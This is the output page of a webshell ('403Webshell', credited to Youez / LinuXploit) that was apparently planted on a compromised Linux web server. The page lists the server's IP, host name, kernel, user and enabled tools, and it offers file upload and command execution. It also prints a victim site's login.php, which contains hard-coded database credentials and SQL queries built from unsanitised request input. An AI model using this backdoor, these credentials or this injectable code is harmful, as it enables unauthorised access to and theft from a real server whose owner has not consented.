403Webshell
Server IP : 103.82.32.14  /  Your IP : 216.73.217.121
Web Server : Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.1e-fips mod_fcgid/2.3.9
System : Linux cloud.lonmanhoabinh.com 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : lonmakmf ( 524)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/seocabra/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/seocabra/public_html//login.php
<?php
if($_REQUEST['submit'] == 'login')
{
	
	$user = $_REQUEST['user'];
	$pass = $_REQUEST['pass'];
	$IDPC = $_REQUEST['IDPCB'];
	if(isset($user) && isset($pass) && isset($IDPC))
	{
		$conn = mysqli_connect('localhost', 'seocabra_m', 'trinhlam', 'seocabra_m') or die ('DIE');
		$sql = 'SELECT `id`,`post_forum`,`spam_facebook`,`check_keywords`, `IDPC` FROM `users` WHERE `user` = "'.$user.'" AND `password` = "'.$pass.'"';
		$result = mysqli_query($conn, $sql);
		if (!$result){
			die ('Câu truy vấn bị sai');
		}
		$row = mysqli_num_rows($result);
		if($row > 0) 
		{
			if($user == "bongdam")
			{
				$row = mysqli_fetch_assoc($result);
				echo json_encode($row);
			}
			else
			{
				$row = mysqli_fetch_assoc($result);
				if($row['IDPC'] == NULL)
				{
					mysqli_query($conn, "UPDATE `users` SET `IDPC` = '" .$IDPC. "' WHERE `id` = " . $row['id'] . "");
				}
				else 
				{
					if($row['IDPC'] == $IDPC)
						echo json_encode($row);
					else
						echo 'false';
				}
			}
			
		}
		else echo 'false';
		mysqli_free_result($result);
		mysqli_close($conn);
	}
	else
	{
		echo 'false';
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit